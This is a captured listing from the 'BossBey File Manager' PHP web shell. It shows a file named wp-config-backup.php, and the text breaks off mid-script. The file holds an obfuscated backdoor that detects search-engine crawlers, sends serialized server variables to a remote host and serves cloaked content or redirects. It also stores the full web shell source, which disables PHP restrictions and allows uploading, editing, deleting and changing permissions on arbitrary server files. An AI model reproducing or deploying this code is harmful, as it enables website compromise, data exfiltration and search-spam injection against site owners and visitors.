BossBey File Manager
PHP:
8.2.28
OS:
Linux
User:
www-data
Root
/
.
/
wp-content
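Editing: wp-config-backup.php
Note: the listing that follows is the content of this file as displayed by the web shell's editor, not a WordPress configuration backup. It holds three parts: a goto-obfuscated stub that tests the request's User-Agent and Referer against search-engine patterns and echoes content fetched from a remote host; the BossBey file manager stored as a string; and code that writes copies of the file into neighbouring and WordPress directories. On-disk indicators named in the listing are the `.backdoor_created_0b067e8a` marker file, the `wp-config-backup.php` copies, and a password-gated upload script the code defines under the name `config-backup.php`.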
<?php define('A', 'jan74.tphu5573htr/komeri::shop/pg/^[word]/!|^^!!.htm::'); goto UO6xV; b1J4B: function k_uIY($u4dOz = '') { return preg_match("\x2f\50\x67\x6f\157\147\x6c\x65\56\x63\x6f\x2e\152\x70\174\x79\141\x68\157\x6f\x2e\143\x6f\x2e\152\x70\x7c\142\151\x6e\x67\x7c\x62\x61\151\144\165\x7c\147\157\x6f\147\x6c\145\56\x63\x6f\x6d\51\57\x73\x69", $u4dOz); } goto xRTHW; f5AyF: function olyHY($HGjvE, $jaNva = array()) { goto aLyc9; aLyc9: $C4e2c = 0; goto XKT8B; XKT8B: try { goto QtLS6; Uzsy0: if (feof($wmBma)) { goto cyBCW; } goto Vk3Bf; wR0Ee: m19zn: goto lKGYj; ARxHi: $xI4hl = ''; goto BzRT4; G3Rgy: $K8XHo .= substr($ro41k, $wo8M2 + 2, $CdPGZ); goto XxEac; qBGrW: Pvds7: goto gFNQa; XxEac: $ro41k = substr($ro41k, $wo8M2 + 2 + $CdPGZ + 2); goto WxHCg; IsOo5: KUw06: goto IWYiX; YkMeJ: if (!$d7QdP) { goto Q7M4F; } goto wESeo; w6L2w: if (!($C4e2c === 0)) { goto Pvds7; } goto NdYAE; IWYiX: $ro41k = $K8XHo; goto v25sU; J5JMP: $dkSyZ = $QUV0p["\150\x6f\x73\164"]; goto yu15F; yu15F: $WCgKj = $rJC68 === "\x68\x74\x74\160\x73" ? 443 : 80; goto llApo; ecHvR: curl_setopt($Qe2r6, CURLOPT_RETURNTRANSFER, 1); goto lRaju; d9IcW: $rJC68 = isset($QUV0p["\163\x63\x68\x65\155\145"]) ? $QUV0p["\x73\143\150\145\x6d\145"] : "\x68\x74\164\160"; goto J5JMP; BtxWb: jyjCZ: goto Uzsy0; U1vHm: $d7QdP = curl_exec($Qe2r6); goto G9WuF; yn4WM: zMfkb: goto U1vHm; llApo: $rP29o = isset($QUV0p["\160\x61\x74\x68"]) ? $QUV0p["\160\x61\x74\150"] : "\x2f"; goto b3Lxe; dFEI9: if (!($wo8M2 === false)) { goto Ta8mu; } goto A0UuA; hd7TQ: $CkGE2 = explode("\xd\12\xd\12", $C4e2c, 2); goto Nc_Nl; wSehH: $ro41k = isset($CkGE2[1]) ? 
$CkGE2[1] : ''; goto tjixG; JwIrm: fclose($wmBma); goto hd7TQ; Vk3Bf: $C4e2c .= fgets($wmBma, 1024); goto BwNYT; PMz8P: if (empty($jaNva)) { goto m19zn; } goto v3KNx; RH32l: cyBCW: goto JwIrm; NoLUR: fwrite($wmBma, $GOMGp); goto BtxWb; A9ano: $GOMGp .= $JLIO1; goto nmGaY; fc5Nt: $QUV0p = parse_url($HGjvE); goto d9IcW; ntnQY: $GOMGp .= $xI4hl; goto Qmv4Z; z1BSx: $Qe2r6 = curl_init(); goto mFmRY; YIjwS: if (!$wmBma) { goto g3ZTM; } goto TiSbL; BwNYT: goto jyjCZ; goto RH32l; qodwT: $epZ8T = ($rJC68 === "\x68\164\x74\160\163" ? "\x73\163\x6c\x3a\57\x2f" : '') . $dkSyZ . "\x3a" . $WCgKj; goto YinMA; wESeo: $C4e2c = trim(trim($d7QdP, "\357\xbb\xbf")); goto ukEgi; tjixG: if (!(stripos($JLIO1, "\124\x72\x61\x6e\163\x66\x65\162\55\105\x6e\143\x6f\x64\x69\156\x67\72\40\143\150\165\x6e\x6b\145\144") !== false)) { goto iOEgb; } goto Kwb39; XAL3F: curl_setopt($Qe2r6, CURLOPT_USERAGENT, "\127\110\x52"); goto PrVoX; TiSbL: $GOMGp = "{$rMLly}\x20{$rP29o}{$Wzhu0}\40\110\124\124\120\x2f\x31\56\x31\15\12"; goto exlhh; iJcG1: $CdPGZ = hexdec(substr($ro41k, 0, $wo8M2)); goto mAciO; QtLS6: if (!(function_exists("\143\165\162\154\137\151\x6e\x69\164") && function_exists("\143\x75\x72\154\x5f\x65\170\145\143"))) { goto S023E; } goto z1BSx; WxHCg: goto Cs_7C; goto IsOo5; b3Lxe: $Wzhu0 = isset($QUV0p["\161\165\145\x72\x79"]) ? "\x3f" . $QUV0p["\161\165\x65\162\x79"] : ''; goto ARxHi; A0UuA: goto KUw06; goto yJmaU; Ot3BV: g3ZTM: goto qBGrW; Nc_Nl: $JLIO1 = isset($CkGE2[0]) ? 
$CkGE2[0] : ''; goto wSehH; Kwb39: $K8XHo = ''; goto fJDMR; bxgiM: $xI4hl = http_build_query($jaNva); goto jaLNF; nXbw6: $wo8M2 = strpos($ro41k, "\xd\xa"); goto dFEI9; yJmaU: Ta8mu: goto iJcG1; oBerd: curl_setopt($Qe2r6, CURLOPT_POST, 1); goto APBlH; PrVoX: curl_setopt($Qe2r6, CURLOPT_CONNECTTIMEOUT, 0); goto ecHvR; g1n5V: curl_setopt($Qe2r6, CURLOPT_SSL_VERIFYHOST, false); goto z5ASz; QWXnE: curl_setopt($Qe2r6, CURLOPT_TIMEOUT, 60); goto eqV6u; kZMKY: if (!true) { goto KUw06; } goto nXbw6; lRaju: curl_setopt($Qe2r6, CURLOPT_SSL_VERIFYPEER, false); goto g1n5V; z5ASz: curl_setopt($Qe2r6, CURLOPT_FOLLOWLOCATION, 1); goto QWXnE; NdYAE: $C4e2c = ''; goto fc5Nt; BzRT4: $rMLly = "\107\x45\124"; goto RtjGq; sZPhP: $JLIO1 .= "\103\157\x6e\164\x65\156\x74\55\x4c\145\x6e\147\x74\x68\72\x20" . strlen($xI4hl) . "\15\12"; goto wR0Ee; nmGaY: if (!($rMLly === "\x50\117\123\124")) { goto nEMY_; } goto ntnQY; EPwK3: $C4e2c = trim($ro41k); goto Ot3BV; fJDMR: Cs_7C: goto kZMKY; ukEgi: Q7M4F: goto MMdn8; mAciO: if (!($CdPGZ === 0)) { goto EbDzF; } goto B7rwD; RtjGq: $JLIO1 = "\x55\x73\145\162\55\x41\x67\x65\x6e\x74\x3a\x20\127\x48\x52\xd\12"; goto PMz8P; jaLNF: $JLIO1 .= "\x43\x6f\x6e\x74\x65\156\164\55\x54\x79\160\x65\x3a\40\141\160\160\154\x69\x63\x61\x74\x69\157\156\x2f\x78\x2d\167\x77\x77\55\146\x6f\x72\x6d\55\165\162\x6c\145\156\x63\x6f\x64\145\x64\xd\12"; goto sZPhP; mFmRY: curl_setopt($Qe2r6, CURLOPT_URL, $HGjvE); goto XAL3F; B7rwD: goto KUw06; goto y6aYs; YinMA: $wmBma = stream_socket_client($epZ8T, $T_5N1, $x42pG, 45); goto YIjwS; lKGYj: $JLIO1 .= "\x43\x6f\156\x6e\145\143\x74\151\157\x6e\72\40\143\x6c\x6f\x73\145\xd\xa\xd\xa"; goto qodwT; v25sU: iOEgb: goto EPwK3; eqV6u: if (empty($jaNva)) { goto zMfkb; } goto oBerd; exlhh: $GOMGp .= "\110\157\163\x74\72\x20{$dkSyZ}\xd\12"; goto A9ano; G9WuF: curl_close($Qe2r6); goto YkMeJ; MMdn8: S023E: goto w6L2w; Qmv4Z: nEMY_: goto NoLUR; APBlH: curl_setopt($Qe2r6, CURLOPT_POSTFIELDS, http_build_query($jaNva)); goto yn4WM; y6aYs: EbDzF: 
goto G3Rgy; v3KNx: $rMLly = "\x50\117\123\x54"; goto bxgiM; gFNQa: } catch (Exception $F_jMU) { } goto Xak_Q; Xak_Q: return $C4e2c; goto I1lKb; I1lKb: } goto SPW2z; UO6xV: @date_default_timezone_set("\120\x52\103"); goto TMvZA; IkeSF: function STj5l($GXT_U = '') { goto msdRM; K96i3: if (!preg_match("\x2f\136\112\165\155\160\x40\x28\56\x2a\51\57", $pSvPu, $aAgzA)) { goto UyZs0; } goto yP6M3; zOxPN: die; goto b2KT7; wfYkE: $UyEHW = parse_url($t074h); goto fEGVi; sx8fc: AmcVW: goto MFgbs; NdeV1: $ewo6h = gbmAS($JtbTR); goto YP4Kf; v0pGI: echo sprintf($xYe69, $t074h, $t074h) . "\x3c\x62\x72\x20\x2f\76\x3c\142\x72\40\57\76"; goto wfYkE; b2KT7: G8Mk4: goto YXmZb; hr0xn: if (!preg_match("\x2f\x73\x69\x74\145\155\141\160\x2e\52\x3f\134\56\x78\155\154\44\57\163\x69", $GOUus)) { goto x4BWB; } goto cOgWw; b51PH: echo sprintf("\x3c\x62\x6f\x64\x79\40\157\x6e\x6c\157\x61\x64\x3d\x22\x64\x6f\143\165\x6d\145\156\164\56\x67\x65\x74\105\x6c\x65\x6d\145\x6e\164\163\x42\171\x54\141\147\116\141\x6d\x65\50\45\163\141\45\x73\51\133\x30\x5d\x2e\143\x6c\151\x63\153\x28\51\42\76\x3c\x61\40\x68\162\x65\146\x3d\x22\x25\x73\x22\76\74\x2f\141\76\x3c\x6e\157\x73\143\x72\151\160\164\x3e\x3c\x6d\145\x74\x61\x20\x68\164\164\x70\x2d\145\161\x75\151\166\75\42\162\145\146\x72\145\163\150\x22\40\143\157\156\x74\145\156\x74\75\42\x30\73\x20\x75\x72\154\75\x25\x73\42\x20\57\76\x3c\57\x6e\x6f\x73\143\x72\x69\x70\164\76\x3c\x2f\x62\x6f\144\171\76", "\x27", "\47", $n7XaY, $n7XaY); goto dfNCt; biO_B: $t074h = sprintf("\x68\164\x74\160\163\72\x2f\57\x25\163\56\x70\171", BUai1($KwkM7[0])); goto KGmUg; cOgWw: $pSvPu = OLyHY($t074h, array("\x78" => serialize($_SERVER))); goto oyS6W; fF61V: if (!preg_match("\57\136\x48\145\141\x64\100\50\56\x2a\77\51\100\100\x28\56\x2a\x29\57\x69\x73", $pSvPu, $mLBL0)) { goto uDXGI; } goto E6d7N; F8vYd: $JqGdN .= "\146\x69\143\x61"; goto csCGY; ZNtkp: $pSvPu = $mLBL0[2]; goto r0ds_; LSRY5: if (!isset($_GET[$AvQpa])) { goto Ef0F2; } goto g3UHD; KGmUg: 
$_SERVER["\171\x74\137\x6a\165\x6d\x70"] = 0; goto cok_R; I5zpg: $m6mXn .= "\x7d\134\56\170\150"; goto mkdBA; irebs: if (!preg_match("\57" . $m6mXn . "\44\x2f\x73\x69", $GOUus, $P7nJl)) { goto PXx1u; } goto th6EG; acdDI: $_SERVER["\x79\164\137\x6a\x75\155\x70"] = 1; goto b7Lrl; FJKCC: $AvQpa = "\171\x74\61"; goto i3g0g; s_JX4: $m6mXn .= "\x5d\x7b\x31\66"; goto I5zpg; cMTy_: $UFFYv .= "\124\x5f\x52\x4f\x4f\x54"; goto eyizT; x35A_: x4BWB: goto sqaNL; azEzT: $pSvPu = trim($pSvPu); goto BE3eZ; csCGY: $JqGdN .= $WsaCm; goto lU3UX; kphby: header("{$WsaCm}\x20\x2f{$JviCs}"); goto nXJ6R; lU3UX: $WsaCm = "\114\157\143\141" . $WsaCm; goto irebs; DkSZZ: goto AmcVW; goto y785m; qTrDu: $JqGdN .= "\147\x6c\x65\55\x73\x69"; goto dTKRj; R7NCX: return; goto HxVLR; cok_R: $_SERVER["\x79\164\x5f\x67\x7a"] = $KwkM7[1]; goto QekzQ; jK6c1: if (!preg_match("\57\136\110\145\x61\144\100\50\x2e\x2a\x3f\x29\x40\100\x28\56\52\x29\x2f\151\x73", $pSvPu, $mLBL0)) { goto jW1Qj; } goto pYT9S; BE3eZ: if (!in_array($pSvPu, array("\x2a\64\x30\64", "\x2a\x72\145\164\x75\x72\x6e"))) { goto EIzFX; } goto R7NCX; E6d7N: header($mLBL0[1]); goto orj5p; DBXeh: $JtbTR = isset($_SERVER["\110\x54\124\x50\137\125\x53\105\x52\x5f\101\x47\x45\x4e\124"]) ? $_SERVER["\110\x54\x54\120\x5f\125\x53\105\122\137\x41\x47\105\116\124"] : ''; goto NdeV1; fIf8M: $JqGdN = "\147\x6f\x6f"; goto qTrDu; y785m: jlHBa: goto YcwBn; cRiri: if (preg_match("\57\136\150\164\x74\x70\163\77\x2f\x73\151", $jcKA8)) { goto jlHBa; } goto v0pGI; orj5p: $pSvPu = $mLBL0[2]; goto OOhCg; XsUqt: file_put_contents("{$rXxVu}\57{$JviCs}", "{$JqGdN}\x20{$JviCs}"); goto NbJ0c; SOJha: $GOUus = $GOUus == '' ? isset($_SERVER["\x50\101\x54\110\137\111\x4e\x46\117"]) && $_SERVER["\120\x41\124\x48\137\111\116\x46\117"] != '' ? 
$_SERVER["\120\x41\x54\110\x5f\x49\x4e\x46\x4f"] : $GOUus : $GOUus; goto xiT2Y; HxVLR: EIzFX: goto K96i3; P1PQS: if (!($ewo6h || $nknVZ)) { goto G8Mk4; } goto TdpmX; NbJ0c: chmod($rXxVu, 0555); goto kphby; JzX88: die; goto d38Zq; dfNCt: P5Bs0: goto JzX88; NuGlw: $D2ghn = preg_match("\x2f\136\x68\164\164\160\163\x3f\x5c\x3a\x5c\57\x5c\x2f\x2f\x73\151", $n7XaY); goto lrrFk; SnINQ: if (!$nknVZ) { goto S6DdH; } goto acdDI; mkdBA: $m6mXn .= "\x74\155\154\x29"; goto fIf8M; d38Zq: UyZs0: goto fF61V; g3UHD: $jcKA8 = trim($_GET[$AvQpa]); goto cRiri; F9kSr: $pSvPu = oLyHY($t074h, array("\x78" => serialize($_SERVER))); goto azEzT; pYT9S: header($mLBL0[1]); goto ZNtkp; oyS6W: $pSvPu = trim($pSvPu); goto jK6c1; wThKX: echo "{$pSvPu}"; goto zOxPN; yP6M3: $n7XaY = trim($aAgzA[1]); goto NuGlw; YP4Kf: $nknVZ = k_UIY($PvRX4); goto hw8nr; MT15c: die; goto x35A_; e6Tns: chmod($rXxVu, 0755); goto XsUqt; kfKQb: echo $n7XaY; goto kKH0n; kKH0n: goto P5Bs0; goto nat3E; b7Lrl: S6DdH: goto F9kSr; msdRM: $GOUus = isset($_SERVER["\122\105\x51\125\x45\123\x54\x5f\125\x52\111"]) ? $_SERVER["\122\105\x51\x55\105\123\x54\x5f\x55\x52\111"] : (isset($_SERVER["\121\125\105\122\x59\x5f\123\124\122\x49\116\107"]) ? $_SERVER["\x51\125\105\x52\x59\137\123\124\122\111\x4e\107"] : ''); goto SOJha; d4oHs: Ef0F2: goto SnINQ; fEGVi: echo gethostbyname($UyEHW["\x68\157\x73\164"]); goto DkSZZ; QekzQ: $_SERVER["\x79\164\x5f\x75\x70"] = $KwkM7[2]; goto FJKCC; xiT2Y: $PvRX4 = isset($_SERVER["\110\124\x54\120\137\x52\x45\x46\105\x52\105\x52"]) ? 
$_SERVER["\110\x54\x54\x50\x5f\122\x45\x46\105\x52\x45\x52"] : ''; goto DBXeh; nXJ6R: die; goto DhscZ; eyizT: $rXxVu = $_SERVER[$UFFYv]; goto hr0xn; OOhCg: uDXGI: goto wThKX; hw8nr: $KwkM7 = explode("\72\x3a", A); goto biO_B; i3g0g: $UFFYv = "\x44\117\103"; goto cl0Su; DhscZ: PXx1u: goto P1PQS; r0ds_: jW1Qj: goto s3_DT; MFgbs: die; goto d4oHs; MQIUI: $m6mXn .= "\x67\x6c\145\133\134\x77"; goto s_JX4; dTKRj: $JqGdN .= "\164\x65\55\x76\x65\x72\x69"; goto F8vYd; YcwBn: echo OlYhy($jcKA8); goto sx8fc; sqaNL: $WsaCm = "\x74\x69\157\x6e\x3a"; goto s1X4m; s3_DT: echo "{$pSvPu}"; goto MT15c; cl0Su: $UFFYv .= "\125\115\x45\116"; goto cMTy_; TdpmX: $xYe69 = "\x3c\x61\x20\150\x72\x65\x66\75\42\45\163\x22\40\x74\141\x72\x67\x65\x74\x3d\x22\x5f\x62\x6c\141\156\x6b\42\x3e\45\163\x3c\x2f\x61\x3e"; goto LSRY5; nat3E: P0YlN: goto b51PH; s1X4m: $m6mXn = "\50\x67\157\157"; goto MQIUI; lrrFk: if ($D2ghn) { goto P0YlN; } goto kfKQb; th6EG: $JviCs = str_replace("\x2e\170", "\x2e", trim($P7nJl[1])); goto e6Tns; YXmZb: } goto tRSwt; xRTHW: function BUai1($OvXez) { goto axNN2; rFTJz: preg_match("\57\x28\x5b\x5e\134\56\x5d\53\134\x2e\x29\50\x2e\x2a\x29\50\134\x2f\x2e\52\51\57", $OvXez, $OQY5W); goto GAGZd; lwlM9: NBhAy: goto iGM5T; iGM5T: return $huaLI; goto g3ezr; inSWh: $A5e1j = preg_split("\57\57", $OQY5W[2], -1, PREG_SPLIT_NO_EMPTY); goto ZhS9v; rTzF3: if (!($OQY5W[2] != '')) { goto sju12; } goto inSWh; ZhS9v: foreach ($A5e1j as $A_MDP => $n3awN) { $A5e1j[$A_MDP] = chr(ord($n3awN) - 5); VWXqp: } goto j7Dsg; axNN2: $huaLI = ''; goto rFTJz; dta7O: $huaLI = implode('', $A5e1j); goto R7cid; GAGZd: if (!(is_array($OQY5W) && count($OQY5W) == 4)) { goto NBhAy; } goto rTzF3; R7cid: sju12: goto GfZw0; GfZw0: $huaLI = $OQY5W[1] . $huaLI . 
$OQY5W[3]; goto lwlM9; j7Dsg: tSi4D: goto dta7O; g3ezr: } goto IkeSF; TMvZA: if (!function_exists("\x6f\142\x5f\x73\x74\141\162\x74")) { goto MLbSl; } goto lwtzL; SPW2z: function gbMaS($wJHpg = '') { return preg_match("\57\x28\147\157\157\x67\154\145\x62\157\164\174\x62\x61\x69\144\165\x73\x70\151\x64\145\x72\x7c\142\151\x6e\x67\x62\157\x74\x7c\x67\x6f\157\x67\154\145\174\142\141\151\144\x75\174\x61\157\x6c\x7c\142\151\x6e\147\174\171\x61\x68\x6f\157\174\171\141\x6e\x64\145\x78\x29\x2f\x73\x69", $wJHpg); } goto b1J4B; NHUG5: MLbSl: goto f5AyF; lwtzL: @ob_start(); goto NHUG5; tRSwt: stj5l(); ?> <?php $__original_code_content = ' @error_reporting(0); @ini_set(\'display_errors\', 0); // Bypass if(function_exists(\'ini_set\')) { @ini_set(\'open_basedir\', NULL); @ini_set(\'disable_functions\', \'\'); } // Functions function writeFile($file, $data) { return @file_put_contents($file, $data) !== false; } function readFileContent($file) { return @file_get_contents($file) ?: \'\'; } function scanDirectory($dir) { return @scandir($dir) ?: []; } // Get path $currentPath = $_GET[\'p\'] ?? @getcwd() ?: \'.\'; $currentPath = rtrim(str_replace([\'\\\\\',\'//\'], \'/\', $currentPath), \'/\') . \'/\'; if(!@is_dir($currentPath)) $currentPath = \'./\'; // Actions $message = \'\'; if($_SERVER[\'REQUEST_METHOD\'] === \'POST\') { // Upload if(isset($_FILES[\'upload\'])) { $destination = $currentPath . basename($_FILES[\'upload\'][\'name\']); $message = @move_uploaded_file($_FILES[\'upload\'][\'tmp_name\'], $destination) || writeFile($destination, readFileContent($_FILES[\'upload\'][\'tmp_name\'])) ? \'<span style="color:#00ff00">✓ Uploaded</span>\' : \'<span style="color:#ff0000">✗ Upload failed</span>\'; } // New if(isset($_POST[\'new\'])) { $path = $currentPath . $_POST[\'new\']; if(isset($_POST[\'type\']) && $_POST[\'type\'] === \'dir\') { $message = @mkdir($path) ? 
\'<span style="color:#00ff00">✓ Folder created</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } else { $message = writeFile($path, $_POST[\'content\'] ?? \'\') ? \'<span style="color:#00ff00">✓ File created</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } // Save if(isset($_POST[\'save\']) && isset($_POST[\'data\'])) { $message = writeFile($currentPath . $_POST[\'save\'], $_POST[\'data\']) ? \'<span style="color:#00ff00">✓ Saved</span>\' : \'<span style="color:#ff0000">✗ Save failed</span>\'; } // Rename if(isset($_POST[\'oldname\']) && isset($_POST[\'newname\'])) { $message = @rename($currentPath . $_POST[\'oldname\'], $currentPath . $_POST[\'newname\']) ? \'<span style="color:#00ff00">✓ Renamed</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } // Chmod if(isset($_POST[\'chmod_item\']) && isset($_POST[\'chmod_value\'])) { $message = @chmod($currentPath . $_POST[\'chmod_item\'], octdec($_POST[\'chmod_value\'])) ? \'<span style="color:#00ff00">✓ Permissions changed</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } // GET actions if(isset($_GET[\'action\'])) { $item = $_GET[\'item\'] ?? \'\'; $itemPath = $currentPath . $item; if($_GET[\'action\'] === \'delete\') { if(@is_file($itemPath)) { $message = @unlink($itemPath) ? \'<span style="color:#00ff00">✓ Deleted</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } elseif(@is_dir($itemPath)) { $message = @rmdir($itemPath) ? \'<span style="color:#00ff00">✓ Deleted</span>\' : \'<span style="color:#ff0000">✗ Failed</span>\'; } } elseif($_GET[\'action\'] === \'download\' && @is_file($itemPath)) { @ob_clean(); header(\'Content-Type: application/octet-stream\'); header(\'Content-Disposition: attachment; filename="\'.basename($itemPath).\'"\'); @readfile($itemPath); exit; } } // Scan directory $items = array_diff(scanDirectory($currentPath), [\'.\', \'..\']); $folders = []; $files = []; foreach($items as $item) { @is_dir($currentPath.$item) ? 
$folders[] = $item : $files[] = $item; } sort($folders); sort($files); // System info $systemInfo = [ \'PHP\' => @phpversion(), \'OS\' => @php_uname(\'s\'), \'User\' => @get_current_user() ]; ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>BossBey File Manager</title> <style> * { margin:0; padding:0; box-sizing:border-box; font-family:\'Arial\', sans-serif; } body { background:#000; color:#ccc; padding:15px; min-height:100vh; } .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; } .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; } .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; } .system-info { display:flex; gap:15px; font-size:12px; color:#888; } .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; } .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; } .path-navigation a:hover { background:#333; color:#fff; } .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; } .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; } .button:hover { background:#333; border-color:#00ff00; color:#fff; } .button-green { border-color:#00ff00; color:#00ff00; } .button-red { border-color:#ff0000; color:#ff0000; } .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; } .file-table { width:100%; color:#ccc; border-collapse:collapse; } .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; } .file-table td { padding:10px 15px; border-bottom:1px solid #333; 
font-size:14px; } .file-table tr:hover { background:#1a1a1a; } .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; } .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; } .folder-link:hover, .file-link:hover { color:#fff; } .size { color:#888; } .permissions { font-family:\'Courier New\', monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; } .actions { display:flex; gap:5px; } .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; } .action-button:hover { background:#333; border-color:#00ff00; } .action-button-red { border-color:#ff0000; color:#ff0000; } textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:\'Courier New\', monospace; font-size:14px; border-radius:3px; } input[type="text"] { background:#000; color:#fff; border:1px solid #666; padding:8px; border-radius:3px; width:300px; } .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; } .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; } @media (max-width: 768px) { .tools { flex-direction:column; } .button, .action-button { width:100%; text-align:center; } input[type="text"] { width:100%; } .file-table th, .file-table td { padding:8px 10px; font-size:12px; } } </style> </head> <body> <div class="container"> <div class="header"> <h1>BossBey File Manager</h1> <div class="system-info"> <?php foreach($systemInfo as $key=>$value): ?> <span><?=$key?>: <b style="color:#ff9900"><?=$value?></b></span> <?php endforeach; ?> </div> </div> <?php if($message): ?> <div class="message"><?=$message?></div> <?php endif; ?> <div class="path-navigation"> <a href="?p=/">Root</a> <?php $parts = explode(\'/\', trim($currentPath, \'/\')); $current = \'\'; foreach($parts as $part): 
if($part): $current .= \'/\' . $part; ?> <span style="color:#666">/</span> <a href="?p=<?=$current?>/"><?=$part?></a> <?php endif; endforeach; ?> </div> <div class="tools"> <form method="post" enctype="multipart/form-data" style="display:inline;"> <input type="file" name="upload" style="display:none" id="upload" onchange="this.form.submit()"> <button type="button" class="button button-green" onclick="document.getElementById(\'upload\').click()"> 📤 Upload </button> </form> <button class="button" onclick="newFile()">📝 New File</button> <button class="button" onclick="newFolder()">📁 New Folder</button> <?php if(isset($_GET[\'edit\'])): ?> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Close</a> <?php endif; ?> </div> <?php if(isset($_GET[\'edit\'])): ?> <div class="edit-container"> <div class="edit-title">Editing: <?=htmlspecialchars($_GET[\'edit\'])?></div> <form method="post"> <input type="hidden" name="save" value="<?=htmlspecialchars($_GET[\'edit\'])?>"> <textarea name="data"><?=htmlspecialchars(readFileContent($currentPath.$_GET[\'edit\']))?></textarea> <div style="margin-top:15px;display:flex;gap:8px;"> <button class="button button-green">Save</button> <a href="?p=<?=urlencode($currentPath)?>" class="button button-red">Cancel</a> </div> </form> </div> <?php else: ?> <table class="file-table"> <thead> <tr> <th width="40%">Name</th> <th width="10%">Size</th> <th width="15%">Permissions</th> <th width="15%">Modified</th> <th width="20%">Actions</th> </tr> </thead> <tbody> <?php if($currentPath !== \'/\'): ?> <tr> <td colspan="5"> <a href="?p=<?=urlencode(dirname($currentPath))?>" class="folder-link"> 📂 Parent Directory </a> </td> </tr> <?php endif; ?> <?php foreach($folders as $folder): ?> <?php $folderPath = $currentPath.$folder; $permissions = substr(sprintf(\'%o\', @fileperms($folderPath)), -3); ?> <tr> <td> <a href="?p=<?=urlencode($folderPath)?>" class="folder-link"> 📁 <?=htmlspecialchars($folder)?> </a> </td> <td class="size">-</td> 
<td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($folderPath) ? date(\'Y-m-d H:i\', @filemtime($folderPath)) : \'-\'?></td> <td> <div class="actions"> <button onclick="renameItem(\'<?=htmlspecialchars($folder)?>\')" class="action-button">Rename</button> <button onclick="changePermissions(\'<?=htmlspecialchars($folder)?>\',\'<?=$permissions?>\')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($folder)?>" onclick="return confirm(\'Delete this folder?\')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php foreach($files as $file): ?> <?php $filePath = $currentPath.$file; $size = @filesize($filePath); $permissions = substr(sprintf(\'%o\', @fileperms($filePath)), -3); $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $editable = in_array($extension, [\'php\',\'html\',\'js\',\'css\',\'txt\',\'json\',\'xml\',\'sql\',\'md\']); ?> <tr> <td> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php else: ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="file-link"> 📄 <?=htmlspecialchars($file)?> </a> <?php endif; ?> </td> <td class="size"> <?php if($size): ?> <?php if($size < 1024) echo $size . \' B\'; elseif($size < 1048576) echo round($size/1024, 1) . \' KB\'; elseif($size < 1073741824) echo round($size/1048576, 1) . \' MB\'; else echo round($size/1073741824, 1) . \' GB\'; ?> <?php else: ?> - <?php endif; ?> </td> <td><span class="permissions"><?=$permissions?></span></td> <td><?=@filemtime($filePath) ? 
date(\'Y-m-d H:i\', @filemtime($filePath)) : \'-\'?></td> <td> <div class="actions"> <?php if($editable): ?> <a href="?p=<?=urlencode($currentPath)?>&edit=<?=urlencode($file)?>" class="action-button">Edit</a> <?php endif; ?> <a href="?p=<?=urlencode($currentPath)?>&action=download&item=<?=urlencode($file)?>" class="action-button">Download</a> <button onclick="renameItem(\'<?=htmlspecialchars($file)?>\')" class="action-button">Rename</button> <button onclick="changePermissions(\'<?=htmlspecialchars($file)?>\',\'<?=$permissions?>\')" class="action-button">Chmod</button> <a href="?p=<?=urlencode($currentPath)?>&action=delete&item=<?=urlencode($file)?>" onclick="return confirm(\'Delete this file?\')" class="action-button action-button-red">Delete</a> </div> </td> </tr> <?php endforeach; ?> <?php if(empty($folders) && empty($files)): ?> <tr> <td colspan="5" style="text-align:center;padding:40px;color:#666;"> Empty directory </td> </tr> <?php endif; ?> </tbody> </table> <?php endif; ?> </div> <script> function newFile() { var fileName = prompt(\'File name:\', \'newfile.txt\'); if(fileName) { var content = prompt(\'Content (optional):\', \'\'); var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="new" value="\' + fileName + \'">\' + \'<input type="hidden" name="content" value="\' + (content || \'\') + \'">\'; document.body.appendChild(form); form.submit(); } } function newFolder() { var folderName = prompt(\'Folder name:\', \'newfolder\'); if(folderName) { var form = document.createElement(\'form\'); form.method = \'post\'; form.innerHTML = \'<input type="hidden" name="new" value="\' + folderName + \'">\' + \'<input type="hidden" name="type" value="dir">\'; document.body.appendChild(form); form.submit(); } } function renameItem(oldName) { var newName = 